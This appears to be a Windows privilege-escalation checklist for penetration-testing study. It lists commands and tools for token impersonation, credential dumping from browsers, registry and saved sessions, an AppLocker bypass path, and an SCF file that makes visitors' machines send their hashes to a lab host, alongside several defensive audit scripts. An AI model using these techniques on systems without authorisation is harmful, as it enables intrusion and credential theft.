# Windows Privesc Checklist

Check for hidden files in PowerShell with `ls -fo` (short for `-Force`)

Refer <https://github.com/maksyche/pentest-everything/tree/master/enum_and_exploit/windows>

## Privileges, groups, etc.

* [ ] Check privileges with `whoami /priv`. If running as a service account (`nt authority/local system` or `Network service`) whose default privileges have been stripped, restore them with [FullPowers](https://github.com/itm4n/FullPowers/releases/tag/v0.1)
  * [ ] If in administrator group but still no access check [UAC](/oscp/readme/privilege-escalation/windows/uac.md)
  * [ ] [SeBackupPrivilege](/oscp/readme/privilege-escalation/windows/sebackupprivilege.md)
  * [ ] [SeRestorePrivilege](/oscp/readme/privilege-escalation/windows/serestoreprivilege.md)
  * [ ] *SeImpersonatePrivilege* --> [GodPotato](https://github.com/BeichenDream/GodPotato), [Potatoes](/oscp/readme/privilege-escalation/windows/potatoes.md)
  * [ ] [SeDebugPrivilege](/oscp/readme/privilege-escalation/windows/sedebugprivilege.md)
  * [ ] [SeEnableDelegationPrivilege](/oscp/readme/privilege-escalation/windows/seenabledelegationprivilege.md)
  * [ ] [SeTakeOwnershipPrivilege](/oscp/readme/privilege-escalation/windows/setakeownershipprivilege.md)
  * [ ] [SeManageVolumePrivilege](/oscp/readme/privilege-escalation/windows/semanagevolumeprivilege.md)
  * [ ] [SeLoadDriverPrivilege](https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system)
  * [ ] [SeMachineAccountPrivilege](https://github.com/0xJs/RedTeaming_CheatSheet/blob/main/windows-ad/Domain-Privilege-Escalation.md)
* [ ] Check group membership with `whoami /groups`

  * [ ] If in *Print Operators* group --> [SeLoadDriverPrivilege](/oscp/readme/privilege-escalation/windows/seloaddriverprivilege.md)
  * [ ] [DnsAdmins](/oscp/readme/privilege-escalation/windows/dnsadmins.md) group
  * [ ] [Hyper-V Administrators](/oscp/readme/privilege-escalation/windows/hyper-v-administrators.md) group
  * [ ] [Server Operators](/oscp/readme/privilege-escalation/windows/server-operators.md) group
  * [ ] If in the **Event Log Readers** group, use

  ```
  wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
  ```

  to search the Security log for events containing `/user` (the `/r`, `/u` and `/p` options are only needed against a remote host; run locally it needs no creds). Can also use:

  ```
  Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
  ```
* [ ] To check for [GPO](/oscp/readme/privilege-escalation/windows/gpo.md) abuse use **PowerView**
* [ ] Check for tokens with [incognito](https://github.com/FSecureLABS/incognito/blob/394545ffb844afcc18e798737cbd070ff3a4eb29/incognito.exe)
  * To list:`.\incognito.exe list_tokens -u`
  * To impersonate: `.\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe`
* [ ] To list environment variables: `set`. Review the `PATH` entries for directories that could be abused to get execution
* [ ] View *named pipes*:

```
pipelist.exe /accepteula
```

Or in *powershell*:

```
gci \\.\pipe\
```

* [ ] To check the DACLs of all named pipes:

```
.\accesschk.exe /accepteula \pipe\
```

To check a particular pipe:

```
accesschk.exe /accepteula \\.\Pipe\lsass -v
```

* [ ] If in the *AD Recycle Bin* group, try:

```
Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *
```

* [ ] If AppLocker is present, place the executable in `C:\Windows\System32\spool\drivers\color` (user-writable, yet allowed by the default `%WINDIR%` rule)
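As an added example (not from the checklist or any tool it links), the following PowerShell script automates the `whoami /priv` and `whoami /groups` review from the top of this section: it parses the CSV output of both commands, flags the privileges and groups the checklist items call out, and reports when `Administrators` is present but marked "Group used for deny only", which is the UAC-filtered token case. The two watch-lists are assumptions drawn from the items above, not an exhaustive catalogue of abusable rights.

```powershell
# Added example: automate the `whoami /priv` / `whoami /groups` review.
# The watch-lists are taken from the checklist items above (assumption).
$WatchedPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
    'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege',
    'SeManageVolumePrivilege', 'SeEnableDelegationPrivilege',
    'SeMachineAccountPrivilege'
)
$WatchedGroups = @(
    'Administrators', 'Print Operators', 'Server Operators',
    'DnsAdmins', 'Hyper-V Administrators', 'Event Log Readers'
)

function Get-TokenPrivilegeReport {
    # /fo csv gives stable column names: "Privilege Name", "Description", "State"
    whoami /priv /fo csv | ConvertFrom-Csv | ForEach-Object {
        [pscustomobject]@{
            Privilege = $_.'Privilege Name'
            State     = $_.State                      # Enabled / Disabled
            Watched   = $WatchedPrivileges -contains $_.'Privilege Name'
        }
    }
}

function Get-TokenGroupReport {
    # Columns: "Group Name", "Type", "SID", "Attributes"
    whoami /groups /fo csv | ConvertFrom-Csv | ForEach-Object {
        $leaf = ($_.'Group Name' -split '\\')[-1]     # strip BUILTIN\ or DOMAIN\
        [pscustomobject]@{
            Group    = $_.'Group Name'
            SID      = $_.SID
            Watched  = $WatchedGroups -contains $leaf
            # A UAC-filtered (medium integrity) admin token lists Administrators
            # with this attribute; see the UAC item above.
            DenyOnly = $_.Attributes -match 'Group used for deny only'
        }
    }
}

$privs  = Get-TokenPrivilegeReport
$groups = Get-TokenGroupReport

"== Privileges of interest =="
$privs | Where-Object Watched | Format-Table -AutoSize
"== Group memberships of interest =="
$groups | Where-Object Watched | Format-Table -AutoSize
if ($groups | Where-Object { $_.DenyOnly -and $_.Group -like '*\Administrators' }) {
    "Administrators is present but deny-only: this is a UAC-filtered token."
}
```

Run it in the context you are assessing; a privilege shown as `Disabled` is still held by the token and can be enabled by the process, which is why the report lists both states.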

## [Mimikatz](/oscp/readme/privilege-escalation/windows/mimikatz.md)

Use Mimikatz once Administrator access is gained. Multiple techniques are outlined in the Mimikatz page.

## SharpDPAPI

```
.\SharpDPAPI.exe machinecredentials
```


### Common Vulnerabilities

* [ ] [PrintNightmare](https://www.hackingarticles.in/windows-privilege-escalation-printnightmare/)

### Social Engineering

* [ ] Make an SCF or [lnk](https://github.com/dievus/lnkbomb) file, put it in a frequently accessed share and start responder :)

SCF file:

```
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```
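Seen from the defender's side, the same technique is easy to hunt for: an SCF, URL or LNK file in a share whose icon or target points at a UNC path will make every file browser that renders the folder reach out to that path. The following PowerShell sweep is an added example (not part of the checklist); `$SharePath` is a placeholder to replace with the share you want to audit.

```powershell
# Added example: defender-side sweep of a share for planted .scf / .url /
# .lnk files whose icon or target points at a UNC path.
$SharePath = '\\FILESERVER\Public'   # placeholder share, not a real host

function Get-UncIconPath {
    param([System.IO.FileInfo]$File)
    switch ($File.Extension.ToLower()) {
        { $_ -in '.scf', '.url' } {
            # INI-style text: look for an IconFile=\\host\share\... line
            $text = Get-Content -Path $File.FullName -Raw -ErrorAction SilentlyContinue
            if ($text -match '(?im)^\s*IconFile\s*=\s*(\\\\[^\r\n]+)') { return $Matches[1] }
        }
        '.lnk' {
            # Shortcuts are binary; let the Windows Script Host object parse them
            $shell = New-Object -ComObject WScript.Shell
            $lnk   = $shell.CreateShortcut($File.FullName)
            foreach ($candidate in @($lnk.IconLocation, $lnk.TargetPath)) {
                if ($candidate -like '\\*') { return $candidate }
            }
        }
    }
    return $null
}

function Find-PlantedUncFiles {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Include *.scf, *.url, *.lnk -ErrorAction SilentlyContinue |
        ForEach-Object {
            $unc = Get-UncIconPath -File $_
            if ($unc) {
                [pscustomobject]@{
                    File      = $_.FullName
                    Modified  = $_.LastWriteTime
                    Owner     = (Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue).Owner
                    UncTarget = $unc
                }
            }
        }
}

Find-PlantedUncFiles -Path $SharePath | Format-Table -AutoSize
```

Any hit with a UNC target outside your own file servers, a recent modification time and an unexpected owner is worth pulling into an investigation; blocking outbound SMB at the perimeter limits what such a file can achieve.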

### Programs & Services

* [ ] To check running services: `tasklist /svc`
* [ ] Check for [Weak Permissions](/oscp/readme/privilege-escalation/windows/weak-permissions.md)
* [ ] Check for [Vulnerable Services](/oscp/readme/privilege-escalation/windows/vulnerable-services.md)
* [ ] Check for [DLL Injection](/oscp/readme/privilege-escalation/windows/dll-injection.md)
* [ ] AppLocker info:

```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

* [ ] If Citrix try [Citrix Breakout](/oscp/readme/privilege-escalation/windows/citrix-breakout.md)
* [ ] To get installed applications:

32 bit (remove `| select displayname` to display all properties):

```
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

64 bit:

```
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

Also check the *Program Files* directories and *Downloads*.

* [ ] To get running processes: `Get-Process`
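The two `Get-ItemProperty` queries above each cover one registry view. The following PowerShell function is an added example (not from the checklist) that merges the 64-bit, 32-bit (`Wow6432Node`) and, going beyond the two keys shown, the per-user `HKCU` Uninstall keys into one inventory with version and publisher, which is what you need when comparing a host against a list of known-vulnerable software.

```powershell
# Added example: one software inventory across the 64-bit, 32-bit and
# per-user Uninstall keys. The HKCU key is an addition to the two keys
# the checklist shows.
function Get-InstalledSoftware {
    $uninstallKeys = @(
        @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*';             Scope = 'Machine 64-bit' }
        @{ Path = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'; Scope = 'Machine 32-bit' }
        @{ Path = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*';             Scope = 'Current user' }
    )
    foreach ($key in $uninstallKeys) {
        # Entries without a DisplayName are patches or leftovers; skip them.
        Get-ItemProperty -Path $key.Path -ErrorAction SilentlyContinue |
            Where-Object { $_.DisplayName } |
            ForEach-Object {
                [pscustomobject]@{
                    Name        = $_.DisplayName
                    Version     = $_.DisplayVersion
                    Publisher   = $_.Publisher
                    InstallDate = $_.InstallDate        # yyyyMMdd string when present
                    Location    = $_.InstallLocation
                    Scope       = $key.Scope
                }
            }
    }
}

# Sort by name; pipe to Export-Csv instead to keep a baseline for later diffing.
Get-InstalledSoftware | Sort-Object Name | Format-Table Name, Version, Publisher, Scope -AutoSize
```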

### Network

* [ ] ARP cache: `arp -a`
* [ ] Network config: `ipconfig /all`
* [ ] Routing table: `route print`
* [ ] For active ports that are listening: `netstat -ano`
  * [ ] Look for services bound only to loopback addresses (*127.0.0.1* and *::1*) rather than to the host's IP address (*10.129.43.8*) or to all interfaces (*0.0.0.0*, *::/0*). Sockets listening only on localhost are often left insecure on the assumption that "they aren't accessible to the network."
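The loopback check above can be done without reading `netstat -ano` by eye. The following PowerShell function is an added example (not from the checklist) that uses `Get-NetTCPConnection` (NetTCPIP module, Windows 8 / Server 2012 and later) to group listening sockets by port, keep only the ports where every listener is bound to loopback, and attach the owning process so each one can be reviewed for missing authentication.

```powershell
# Added example: find TCP ports that are listening only on loopback
# (127.0.0.1 / ::1) and name the owning process. These are the sockets the
# checklist singles out, because "localhost only" is often mistaken for
# "not exposed". Uses Get-NetTCPConnection instead of parsing netstat text.
function Get-LoopbackOnlyListeners {
    $loopback  = @('127.0.0.1', '::1')
    $listeners = Get-NetTCPConnection -State Listen

    # Group by port: a port counts as loopback-only when none of its
    # listeners is bound to a routable or wildcard (0.0.0.0 / ::) address.
    foreach ($portGroup in ($listeners | Group-Object LocalPort)) {
        $exposed = @($portGroup.Group | Where-Object { $_.LocalAddress -notin $loopback })
        if ($exposed.Count -gt 0) { continue }

        foreach ($conn in $portGroup.Group) {
            $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Port    = $conn.LocalPort
                Address = $conn.LocalAddress
                PID     = $conn.OwningProcess
                Process = if ($proc) { $proc.ProcessName } else { '<unknown>' }
            }
        }
    }
}

Get-LoopbackOnlyListeners | Sort-Object Port | Format-Table -AutoSize
```

Every row is a service that another local user or process can reach; for each one, confirm it authenticates its callers and does not run as a more privileged account than the users who can connect to it.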

## Files & Creds (PuTTY, Autologon, etc.)

* [ ] [Credential Hunting](/oscp/readme/privilege-escalation/windows/credential-hunting.md)
* [ ] PowerShell

  To check if Script Block Logging or PowerShell Transcription is turned on:

  ```
  Get-History
  ```

  `Clear-History` does not clear the PSReadLine history file; find its path with:

  ```
  (Get-PSReadlineOption).HistorySavePath
  ```

  Go to that path and check it too.

  To display it now:

  ```
  type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  ```

  ```powershell
  type C:\Users\Public\Transcripts\transcript01.txt
  ```
* [ ] Check for stored credentials:

```
cmdkey /list
```

If stored credentials are present, you can run commands as that user:

```
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
```
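The PowerShell item above asks whether Script Block Logging or Transcription is on and where the PSReadLine history lives. The following PowerShell script is an added example (not from the checklist) that answers both directly: it reads the policy keys under `Policies\Microsoft\Windows\PowerShell` in HKLM and HKCU, reports the transcript directory (defaulting to the user's Documents folder when the policy sets none), and locates the PSReadLine history file. From the defender's side this is the check that tells you what a session on this host leaves behind.

```powershell
# Added example: report which PowerShell logging controls are enabled on
# this host and where the PSReadLine history file lives. Policy keys are
# read from both HKLM and HKCU (HKLM is checked first).
$PolicyRoots = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
)

function Get-PolicyValue {
    # Returns the first value found under the policy roots, or $null.
    param([string]$SubKey, [string]$Name)
    foreach ($root in $PolicyRoots) {
        $item = Get-ItemProperty -Path "$root\$SubKey" -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $item) { return $item.$Name }
    }
    return $null
}

function Get-PowerShellLoggingStatus {
    $transcribe = Get-PolicyValue 'Transcription' 'EnableTranscripting'
    $outputDir  = Get-PolicyValue 'Transcription' 'OutputDirectory'

    # PSReadLine is only loaded in interactive consoles; fall back to its
    # default location under APPDATA otherwise.
    $historyPath = if (Get-Command Get-PSReadLineOption -ErrorAction SilentlyContinue) {
        (Get-PSReadLineOption).HistorySavePath
    } else {
        Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    }

    [pscustomobject]@{
        ScriptBlockLogging  = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging       = (Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription       = $transcribe -eq 1
        # With transcription on and no OutputDirectory set, transcripts land
        # in the user's Documents folder.
        TranscriptDirectory = if ($outputDir) { $outputDir } elseif ($transcribe -eq 1) { Join-Path $env:USERPROFILE 'Documents' } else { $null }
        PSReadLineHistory   = $historyPath
        HistoryFileExists   = [bool]($historyPath -and (Test-Path -Path $historyPath))
    }
}

Get-PowerShellLoggingStatus | Format-List
```

If Script Block Logging is on, the commands run in a session are recorded in the `Microsoft-Windows-PowerShell/Operational` log (event ID 4104) regardless of what `Clear-History` does to the in-memory history.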

* [ ] Browser Credentials:

```
.\SharpChrome.exe logins /unprotect
```

* [ ] Use *LaZagne* to recover various stored credentials
* [ ] To look for saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials:

```
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
# Locally:
Invoke-SessionGopher -Thorough
```

* [ ] Clear-text passwords in the registry. *Autologon*:

  ```
  reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
  ```

  *PuTTY*:\
  For sessions:

  ```
  reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
  ```

  For keys and values of session:

  ```
  reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
  ```
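The three `reg query` commands above can be turned into a single audit. The following PowerShell script is an added example (not from the checklist) that reads the Winlogon key and reports whether an Autologon password is sitting in the registry as clear text (`DefaultPassword`, readable by every local user) rather than as an LSA secret, and then walks every PuTTY session under `HKCU`, decoding the URL-encoded session names (`kali%20ssh`) and reporting host, user, private-key path and whether a proxy password is stored, since PuTTY keeps proxy passwords in plain text.

```powershell
# Added example: audit the Winlogon Autologon values and the PuTTY session
# keys for stored secrets.
function Get-AutologonStatus {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $w = Get-ItemProperty -Path $key -ErrorAction Stop
    [pscustomobject]@{
        AutoAdminLogon    = ($w.AutoAdminLogon -eq '1')      # REG_SZ "1" when enabled
        DefaultDomainName = $w.DefaultDomainName
        DefaultUserName   = $w.DefaultUserName
        # A non-empty DefaultPassword is readable by every local user.
        # Sysinternals Autologon stores the password as an LSA secret instead.
        ClearTextPassword = [bool]$w.DefaultPassword
        AutoLogonCount    = $w.AutoLogonCount
    }
}

function Get-PuttySessionSecrets {
    $sessionsKey = 'HKCU:\SOFTWARE\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path -Path $sessionsKey)) { return }
    Get-ChildItem -Path $sessionsKey | ForEach-Object {
        $s = Get-ItemProperty -Path $_.PSPath
        [pscustomobject]@{
            # Session names are URL-encoded in the registry, e.g. kali%20ssh
            Session          = [uri]::UnescapeDataString($_.PSChildName)
            Host             = $s.HostName
            Port             = $s.PortNumber
            User             = $s.UserName
            PrivateKeyFile   = $s.PublicKeyFile   # PuTTY's name for the .ppk path
            HasProxyPassword = [bool]$s.ProxyPassword   # stored in plain text by PuTTY
            ProxyUser        = $s.ProxyUsername
        }
    }
}

"== Winlogon =="
Get-AutologonStatus | Format-List
"== PuTTY sessions =="
Get-PuttySessionSecrets | Format-Table -AutoSize
```

A `ClearTextPassword` of `True` or any session with `HasProxyPassword` set is a finding in its own right; the fix is to move Autologon to an LSA secret (or remove it) and to strip proxy credentials from saved sessions.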

